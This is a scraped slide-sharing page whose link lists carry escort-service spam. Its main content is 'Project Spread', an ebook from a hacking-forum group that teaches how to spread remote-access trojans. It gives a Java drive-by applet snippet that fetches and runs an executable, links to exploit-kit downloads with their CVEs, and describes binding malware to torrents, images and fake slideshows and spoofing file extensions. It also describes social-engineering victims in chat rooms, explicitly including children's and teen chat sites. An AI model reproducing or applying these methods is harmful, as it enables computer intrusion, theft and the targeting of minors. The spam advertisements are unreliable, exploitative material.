Gfe Mayur Vihar Call Girls Service WhatsApp -> 9999965857 Available 24x7 ^ De...Gfe Mayur Vihar Call Girls Service WhatsApp -> 9999965857 Available 24x7 ^ De...
Gfe Mayur Vihar Call Girls Service WhatsApp -> 9999965857 Available 24x7 ^ De...srsj9000
 
Call Girls Narol 7397865700 Independent Call Girls
Call Girls Narol 7397865700 Independent Call GirlsCall Girls Narol 7397865700 Independent Call Girls
Call Girls Narol 7397865700 Independent Call Girlsssuser7cb4ff
 
INFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETE
INFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETEINFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETE
INFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETEroselinkalist12
 
Concrete Mix Design - IS 10262-2019 - .pptx
Concrete Mix Design - IS 10262-2019 - .pptxConcrete Mix Design - IS 10262-2019 - .pptx
Concrete Mix Design - IS 10262-2019 - .pptxKartikeyaDwivedi3
 
UNIT III ANALOG ELECTRONICS (BASIC ELECTRONICS)
UNIT III ANALOG ELECTRONICS (BASIC ELECTRONICS)UNIT III ANALOG ELECTRONICS (BASIC ELECTRONICS)
UNIT III ANALOG ELECTRONICS (BASIC ELECTRONICS)Dr SOUNDIRARAJ N
 
Effects of rheological properties on mixing
Effects of rheological properties on mixingEffects of rheological properties on mixing
Effects of rheological properties on mixingviprabot1
 
Study on Air-Water & Water-Water Heat Exchange in a Finned Tube Exchanger
Study on Air-Water & Water-Water Heat Exchange in a Finned Tube ExchangerStudy on Air-Water & Water-Water Heat Exchange in a Finned Tube Exchanger
Study on Air-Water & Water-Water Heat Exchange in a Finned Tube ExchangerAnamika Sarkar
 
Call Girls Delhi {Jodhpur} 9711199012 high profile service
Call Girls Delhi {Jodhpur} 9711199012 high profile serviceCall Girls Delhi {Jodhpur} 9711199012 high profile service
Call Girls Delhi {Jodhpur} 9711199012 high profile servicerehmti665
 
VICTOR MAESTRE RAMIREZ - Planetary Defender on NASA's Double Asteroid Redirec...
VICTOR MAESTRE RAMIREZ - Planetary Defender on NASA's Double Asteroid Redirec...VICTOR MAESTRE RAMIREZ - Planetary Defender on NASA's Double Asteroid Redirec...
VICTOR MAESTRE RAMIREZ - Planetary Defender on NASA's Double Asteroid Redirec...VICTOR MAESTRE RAMIREZ
 
Architect Hassan Khalil Portfolio for 2024
Architect Hassan Khalil Portfolio for 2024Architect Hassan Khalil Portfolio for 2024
Architect Hassan Khalil Portfolio for 2024hassan khalil
 
Introduction-To-Agricultural-Surveillance-Rover.pptx
Introduction-To-Agricultural-Surveillance-Rover.pptxIntroduction-To-Agricultural-Surveillance-Rover.pptx
Introduction-To-Agricultural-Surveillance-Rover.pptxk795866
 
IVE Industry Focused Event - Defence Sector 2024
IVE Industry Focused Event - Defence Sector 2024IVE Industry Focused Event - Defence Sector 2024
IVE Industry Focused Event - Defence Sector 2024Mark Billinghurst
 

Recently uploaded (20)

Electronically Controlled suspensions system .pdf
Electronically Controlled suspensions system .pdfElectronically Controlled suspensions system .pdf
Electronically Controlled suspensions system .pdf
 
pipeline in computer architecture design
pipeline in computer architecture  designpipeline in computer architecture  design
pipeline in computer architecture design
 
GDSC ASEB Gen AI study jams presentation
GDSC ASEB Gen AI study jams presentationGDSC ASEB Gen AI study jams presentation
GDSC ASEB Gen AI study jams presentation
 
young call girls in Green Park🔝 9953056974 🔝 escort Service
young call girls in Green Park🔝 9953056974 🔝 escort Serviceyoung call girls in Green Park🔝 9953056974 🔝 escort Service
young call girls in Green Park🔝 9953056974 🔝 escort Service
 
Call Us -/9953056974- Call Girls In Vikaspuri-/- Delhi NCR
Call Us -/9953056974- Call Girls In Vikaspuri-/- Delhi NCRCall Us -/9953056974- Call Girls In Vikaspuri-/- Delhi NCR
Call Us -/9953056974- Call Girls In Vikaspuri-/- Delhi NCR
 
EduAI - E learning Platform integrated with AI
EduAI - E learning Platform integrated with AIEduAI - E learning Platform integrated with AI
EduAI - E learning Platform integrated with AI
 
Design and analysis of solar grass cutter.pdf
Design and analysis of solar grass cutter.pdfDesign and analysis of solar grass cutter.pdf
Design and analysis of solar grass cutter.pdf
 
Sachpazis Costas: Geotechnical Engineering: A student's Perspective Introduction
Sachpazis Costas: Geotechnical Engineering: A student's Perspective IntroductionSachpazis Costas: Geotechnical Engineering: A student's Perspective Introduction
Sachpazis Costas: Geotechnical Engineering: A student's Perspective Introduction
 
Gfe Mayur Vihar Call Girls Service WhatsApp -> 9999965857 Available 24x7 ^ De...
Gfe Mayur Vihar Call Girls Service WhatsApp -> 9999965857 Available 24x7 ^ De...Gfe Mayur Vihar Call Girls Service WhatsApp -> 9999965857 Available 24x7 ^ De...
Gfe Mayur Vihar Call Girls Service WhatsApp -> 9999965857 Available 24x7 ^ De...
 
Call Girls Narol 7397865700 Independent Call Girls
Call Girls Narol 7397865700 Independent Call GirlsCall Girls Narol 7397865700 Independent Call Girls
Call Girls Narol 7397865700 Independent Call Girls
 
INFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETE
INFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETEINFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETE
INFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETE
 
Concrete Mix Design - IS 10262-2019 - .pptx
Concrete Mix Design - IS 10262-2019 - .pptxConcrete Mix Design - IS 10262-2019 - .pptx
Concrete Mix Design - IS 10262-2019 - .pptx
 
UNIT III ANALOG ELECTRONICS (BASIC ELECTRONICS)
UNIT III ANALOG ELECTRONICS (BASIC ELECTRONICS)UNIT III ANALOG ELECTRONICS (BASIC ELECTRONICS)
UNIT III ANALOG ELECTRONICS (BASIC ELECTRONICS)
 
Effects of rheological properties on mixing
Effects of rheological properties on mixingEffects of rheological properties on mixing
Effects of rheological properties on mixing
 
Study on Air-Water & Water-Water Heat Exchange in a Finned Tube Exchanger
Study on Air-Water & Water-Water Heat Exchange in a Finned Tube ExchangerStudy on Air-Water & Water-Water Heat Exchange in a Finned Tube Exchanger
Study on Air-Water & Water-Water Heat Exchange in a Finned Tube Exchanger
 
Call Girls Delhi {Jodhpur} 9711199012 high profile service
Call Girls Delhi {Jodhpur} 9711199012 high profile serviceCall Girls Delhi {Jodhpur} 9711199012 high profile service
Call Girls Delhi {Jodhpur} 9711199012 high profile service
 
VICTOR MAESTRE RAMIREZ - Planetary Defender on NASA's Double Asteroid Redirec...
VICTOR MAESTRE RAMIREZ - Planetary Defender on NASA's Double Asteroid Redirec...VICTOR MAESTRE RAMIREZ - Planetary Defender on NASA's Double Asteroid Redirec...
VICTOR MAESTRE RAMIREZ - Planetary Defender on NASA's Double Asteroid Redirec...
 
Architect Hassan Khalil Portfolio for 2024
Architect Hassan Khalil Portfolio for 2024Architect Hassan Khalil Portfolio for 2024
Architect Hassan Khalil Portfolio for 2024
 
Introduction-To-Agricultural-Surveillance-Rover.pptx
Introduction-To-Agricultural-Surveillance-Rover.pptxIntroduction-To-Agricultural-Surveillance-Rover.pptx
Introduction-To-Agricultural-Surveillance-Rover.pptx
 
IVE Industry Focused Event - Defence Sector 2024
IVE Industry Focused Event - Defence Sector 2024IVE Industry Focused Event - Defence Sector 2024
IVE Industry Focused Event - Defence Sector 2024
 

Easiest Ways to Spread Files Using Popular Sites and Apps

  • 1. Projecct Spread By: WiFi. & The Rats Crew Members
  • 2. Before We Start So, you might be wondering how this got started? Well I (WiFi.) noticed that the Rats Crew had gone a little bit low qulity lately, so to try and improve and heighten the quality of the group I made a project that members completed. Zach and I pushed this project and as I can see it, it worked. Overall, I believe the quality of the group has enhanced. We are very proud of every member that did their duty and made a tutorial. All the tutorials here are made by members here on Hack Forums that are in the Rats Crew. Please note that this Ebook is used for educational purposes only. This Ebook is property of The Rats Crew, any and all changes must be approved by a leader. Please do not edit or try to resell this e-book, any attempts shall get reported to staff members. All credit goes to the group members for making the tutorials and also WiFi. Please note that they tutorials are word for word from the threads in the sub forum in the group.
  • 3. Table Of Contents 1. Youtube Spreading 2. Java Drive By Spreading 3. Spreading With Blogger 4. Spreading with Exploits 5. Ewhore Spreading 6. Torrent Spreading (3 Ways) 7. Jpeg Spreading 8. Yahoo Spreading 9. SlideShow Spread 10.ApexDC++ Spreading 11.Conclusion
  • 4. YouTube Spreading Made By: Cortufasos Links: RAT's Crew Extension Spoofer: http://www.hackforums.net/showthread.php?tid=1429385 Online Video Downloader: http://www.savevid.com/ Enhance Views: http://www.enhanceviews.net/
  • 5. Java Drive By Made By: Vexna First copy the Youtube sources and paste it to notepad then paste the Java code before the body tag. Java code is in the index.php. <applet width='150' height='1' code='Java.class' archive='Java.jar'><param name='lol' value='http://www.yoursite.com/yourfile.exe' /><param name='location' value='%APPDATA%' /><param name='file' value='BpldpPfRT.exe' /><param name='r' value ='' /></applet> Put the direct link of your server like on the picture. Upload all and see the result. Download link of the Java Drive By without template: http://www.mediafire.com/?n785f77swm1l77w Download link of Adut Cam Java Drive By (Thanks to nidhish91): http://www.mediafire.com/?u17bug3b34vwf5l Thanks to Exal for the GFX.
  • 6. Spreading With Blogger Made By: jhfire Introduction : Blogger is a blogging website that is set up for individuals that love to blog, but don't actually know anything about websites. Blogger was bought out by Google and has become pretty much a waste land, besides are trusty skiddles that exchange adsence clicks and stay at home moms. Google is a trusted, well known, and the worlds most powerful country (soon). Now people have a reason to trust Blogger, cause Google owns it and nothing can go wrong. Can it? Actually it can! If you have a Java Drive-By or a top secret exploit that is beast you can just slip that code right into your fake Blogger and start spreading right off the bat You will need a Blogger account. You can sign up for free at http://www.blogger.com. When you have your account setup you’re now ready to begin! You will need to create a blog of course and pick a simple template as well. Make sure you have some content on there; it will lure people into the blog making it even more trustworthy! After everything is setup you need to get to the HTML of the blog. However, we need to setup our code first. That is my original code from the index.html file. I will need to edit this code to be able to use it on Blogger. Changed to this: As you can see, I only added the </param> tags and the http://www.mywebsite.com/. You will need to specify where the .jar is uploaded at. Now we need to stick this code into blogger and it will work! As you can see, I have put the code inside the <body> tag! Now when you save the template and view the page, your Java Drive-By will come right up! You’re finally done! You can now send the link to people and begin getting downloads.
  • 7. Spreading with Exploits Made By: TheUzuki.' Exploiting History: Originally Exploits were not used to spread Malware over the net, but today it is one of the most effective, but also expensivest Methods. Maybe you know the Exploit Kit "Bleeding Life". This Exploit kit has a good chance to infect others without they are knowing about it. It is something like a silent Java Driveby. However, spreading with Exploits CAN be very very successful, but also very very unsuccessful. There are many companys which are upgrading their Programs like adobe reader or player very fast. exploit Kits belong to the section of Weaponized Exploits ! Exploiting It: As I said, exploiting can be very easy. You just have to send your slave to a special Web adress and they are infected. This is the BIG advantage. But this will not work everytime. To set up our own exploiting / silent downloade package we are visiting 1337day or exploit-DB and search for something like adobe player. View the source code and learn how to use it. If you have done this, it is time to prepare your exploit kit, you can take a public one and modify it or you can make your own. This is totally up to you. To modify your Exploit Kit, try to find out how the exploit is called in the exploit.php / index.php / config.php file. Attention ! It is not easy to use this. But let's take a closer look at the Exploits the exploit Kit Bleeding Life is using: [x] CVE-2008-2992 [x] CVE-2010-0188 [x] CVE-2010-0842 [x] CVE-2010-1297 [x] CVE-2010-2884 [x] CVE-2010-3552 [x] JavaSignedApplet - (Requires user interaction but can be disabled.) [x] All exploits bypass ASLR and DEP where needed. If we are googling these CVE's we find a short description of the Exploit, http://cve.mitre.org/cgi-bin/cvename.cgi...-2008-2992
  • 8. Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument, a related issue to CVE-2008-1104. So we see, the adobe acrobat reader is exploited with a Buffer Overflow (Stack Based) using the printf function. What the Exploit actually does is trying to get the adobe acrobat reader Overflows the Buffer and then rewrites the Return Adress to execute a malicious payload that loads the server in to the victims PC and executes it. Lets look at an other one: http://cve.mitre.org/cgi-bin/cvename.cgi...-2010-2884 Adobe Flash Player 10.1.82.76 and earlier on Windows, Mac OS X, Linux, and Solaris and 10.1.92.10 on Android; authplay.dll in Adobe Reader and Acrobat 9.x before 9.4; and authplay.dll in Adobe Reader and Acrobat 8.x before 8.2.5 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, as exploited in the wild in September 2010. This exploit trys to exploit the Adobe Flash Player to execute arbitrary codes on your system. This can be executing and downloading a server or what ever. Get these Exploits: Smart Pack Exploit: http://www.mediafire.com/?fd2634pc46v6b7a Bleeding Life Exploits: http://www.mediafire.com/?eo9w77hb5549i4s Bleeding Life Exploit decrypter: http://www.mediafire.com/?r89uew5j9hdgxdl Bleeding Index.php file / config.php file: http://www.mediafire.com/?fby90nbc92urvo2 – index http://www.mediafire.com/?4rzt7mqwfv4ed5n – config What is wrong with the Bleeding Life Exploits ?: Yeah, to prevent them from beeing detected by Anti Viruses they have been encrypted with ioncube. How to decrypt this is up to you. I also uploaded the index file and the configuration file, so that you can look through it. I just can say LEARN and watch Tutorials ;) Sorry for the grammatical errors, english is not my native language. And writing something like this is a big deal for me ;)
  • 9. Ewhore Spreading Made By: masterfan Introduction: Ewhore Spreading is one of the easiest spreading methods.It will get you a lot of victims and can earn you some good cash if you add more black hat into it. Preparations: Once you got your server FUD you need to make sure you bind it with a picture and add image icon. Here comes the important part.Change the extension of your file from .exe to .com and rename your picture to your msn address.Example: JessicaSwitz438@hotmail.com. That way your server won't be so suspicious.Not many people knows about that so don't worry about getting caught. If you are stuck with that step just search for tutorial on HF. Website list: http://omegle.com/ -Not good for a lot of bots but you can get some rich pedos. http://www.teenchat.com/ -You will get a lot of teens from there. http://www.chat-avenue.com/ -Still good but high risk getting banned from admin http://kidschat.net/ -A lot of victims here. http://javachatrooms.net/ -Not really good but you can try it. http://www.adultchat.net -A lot of traffic.Best one to spread. Overall Thoughts: Ewhoring spreading is good but involves a lot of work.It's not the same thing as torrent so you just do something else and get victims.I've done it few times and believe me it brought me a lot of bots. This spreading method can bring you a lot of cash if you include "Ewhoring" with it. This method takes time and persistence and It's the one I would suggest you the most.(Expect the one I use but it's my creation lol) It only took me 10 minutes to write this because I'm really bussy with other work and I saw "Project Spread"topic today so yeah.Tell me what you think about it.
  • 10. Torrent Spreading Made By: aspirin™ Things needed: uTorrent, File Renamer, TPB File Name Leecher, Easy Binder. Method 1: 1. Start "TPB File Name Leacher" and select "Top 100 Games" list. 2. In its directory, a text file will be created named "output". 3. Start File Renamer and click on Menu and then Import Names. Navigate to where you saved TPB File Name Leacher and select your output file there. 4. Now Click "Start Grab" and choose your server and then choose where to save the files. 5. In the directory you selected you will have around 100 copies of your server with file names which are the Top 100 games. Note: These settings are common for other 2 methods too. 6. Start uTorrent and click "Create new Torrent" or hit Ctrl+N. 7. In select source, select your exe file which you think many people will download. I'd recommend some cracks as they are mostly small size and your server is probably going to be of a small size like 1-2 MB. 8. In trackers, add this: the items in this link http://pastebin.com/JhfaZTT2, 9. Make sure "Start Seeding" is ticked. Click "Save and Start Seeding". Your torrent file is now ready.
  • 11. Method 2: For this skip steps 1-5 and follow these 1. Take a popular program such as one on "The Pirate Bay Top 100 Applications" list. 2. Download it. Use a binder such as Easy Binder to bind your server to the Application. Follow Step 6 from Method 1. Method 3: 1. Goto billboard.com and see the "Top 100" songs. 2. Select 3-4 songs and download them. I'd recommend some Top 10 songs. 3. Create a fake program in Microsoft Visual Basic which only displays the password. 4. Once you've downloaded the song, compress it using WinRar with a password. 5. Bind your server to your fake program made in Visual Basic which displays the password. 6. Now, place your song RAR file and your password exe in the same directory and compress both using WinRar without a password this time. 7. Follow Step 6 onwards now for Method 1.
  • 12. Jpeg Spreading Made By: Black Shadow This method is so simple but very effective, there are 2 ways to spread your server with this method. Lets start by making your servers we are going to use. We are going to use a pic for the first method 1. Go to any forum or site and download a set of images. 2. Put images in a new folder " name it what you like " 3. In that folder create another new folder " name it Extra pics " 4.Make server bind with different pic, also make an icon of the pic and add this to your server, rename extension .scr 5. Put your server in the folder named " Extra" 6. RaR it all upload, find forums join then post thread to link of your pics. The second method is using a txt file as your server. 1. Go to any forum or site and download a set of images. 2. Put images in a new folder " name it what you like " 3. RaR the folder and password protect 4. When making your server, bind a txt file with the pass typed into it, change icon to notepad, just leave extension as .exe name the txt file " pass" 5. Put your server and the password protected RAR in another folder and RaR it again without password 6. Upload, find forums join then post thread to link of your pics. You can use the txtploit method for this also. Download pdf here spread by txt not exe [Exploit]
  • 13. Yahoo Spreading Made By: nidhish91 Requirements: 1.A fake yahoo account with a female username(LOLz), 2.Your FUD server with image icon 3.Rats Crew Extension Spoofer by KillaMuvz to spoof your exe extension to jpeg. STEP 1: First we open yahoo messenger and login with our fake account, Then go to Messenger option > Yahoo! Chat > Join A Room STEP 2: After that select the chat rooms you feel like ! I go for chat rooms where I can get many male victims to make work easier . You can go in any of your choice but I prefer you go in the Romance Section. STEP 3: After getting in any of the rooms , make a comment in the public chat space saying "Looking for Quality chat with a guy , hit me up" or anything which gets peoples attention towards you. STEP 4: Now guys will hit you up and your main thing starts ! You dont need to chat much with them coz there are thousands of request at a time so make it short by sending the file and stating "Have a look at my pic honey and say how do I look" , show your creativity ! Note that you drag the picture in the on going messenger and not select Picture sharing option People will accept the download and you are good to go then ! After the download is complet
  • 14. Now check your Rat client and youll have a new slave in your list (The blue one is the new slave I got) Note: 1.Not all will download the file , coz not all are fools so block the user if they come to know 2.Sometimes the transfer is completed but it shows an error , try sending again 3.You can get almost 25-40 installs in almost an hour (Yes you can)
  • 15. SlideShow Spread Made By: SaNƹ Tools you will use: Your RAT server, ResHacker, Girl picture, Image converter, My fake slide-show, Binder. 1st: Start by downloading the following tools: -ResHacker -My fake slide show NOTE: This will fool your taget into thinking it's an actual slideshow. Therefore, they won't be as skeptical when opening the ".exe". This file is clean. Here is a scan from virustotal if you don't trust me =P: How it works?: When you first open the fake slide-show, it will seem as it is loading some pictures. As soon as the progress bar reaches 100%, the program will display this error: When the slave tries to re-open the fake slideshow file, it will simply display the error message again then close itself. In other words, it will ONLY run ONCE. Pretty simple right? This will make sure the slave doesn't try to re-open the file too much. 2nd: Now you will need to find and download a picture of a cute/hot girl. For this, I recommend going to google and searching for something like: -"cute facebook girl" -"hot facebook girl" Why insert "facebook"? Simple: Facebook display pictures don't display nudity. So it will be the right amount of exposure and it doesn't look too suspicious. 3rd: Once you have a picture, you will need to make an icon version of it. You can use this website for that: http://www.coolutils.com/Online/Image-Converter/
  • 16. 4th: You will now need to bind your RAT server and the fake photo slide-show. 5th: Next, open up ResHacker. Here's what you need to do: Click "File" > "Open". Navigate to the .exe file that is binded and open it. You should see something like this: Click on "Icon Group" > "Random number" > "0". Right-click on "0", then click on "Replace resource...". Select "Open file with new icon..". Now, open the icon you created in step #3. Click on "Replace". (You should now see the icon replaced). Finally, click on: "File" > "Save As..." > Name it: "MySlideShow.exe" > "Save". Note: Give it any name you wish, but it's very important you add the ".exe" at the end of the file's name. TIP: Give it a name such as: Christina_Slideshow.exe This is just to lower your slave's suspicion. 6th: Your "slide-show" is now ready to spread!
  • 17. ApexDC++ Spreading Made By: ๖ Rage Now first here are a list of programs we will need: ApexDC++, Name Leecher, Now lets begin, I will be using Aryan IRC Bot, Simply because I need more bots for this. You will need the Name Leecher for this part. Now that you have the file downloaded and Open Click File, then Start Grab. Then names will start generating, too stop this simply click Start Copy. Now that you got the names open in the name leecher time too copy the EXE's Too the names. Click Menu, then Start Copy. Create a folder, then choose your exe File, and Finally choose the folder you created too have the exe's copied to. This will be the out come of the folder: Click on settings
  • 18. Click the Directories too were the folder of the exe's are.: Now that you have clicked the destination it should bring up an upload screen as you can see here That means it uploaded the files, but before anyone can download you must join a lot of hubs. How to join a hub is simple, just simply click on public hubs button on the top left corner, its blue and looks like a orb. Then click on hubs you see, I advise clicking a lot the better chance of getting many victims. That is the bottom of your screen, The key is not closing out Apex so people could leech the files. Again it is better if the file is FUD because there are admins that scan the files too detect viruses and if it detects one as a virus than it automatically ban you from that hub.
  • 19. END So we hope you enjoyed reading this ebook and that you gained a lot of new knowledge. We hope to make and release more Ebooks to the community of HackForums soon. If you liked this Ebook, make sure to donate some money to the group. Any amount of money are accpted. We are trying to get the Rats Crew a paid group so it does not get removed. Please message the user Zach to make donations. So if you want to learn more and want to be a part of this group The Rats Crew do not forget to apply when the recruitment thread is opened. Credits: WiFi. – Making the project idea and making it come alive Members In The Rats Crew – For making the tutorials Existence – For grammar and spell checking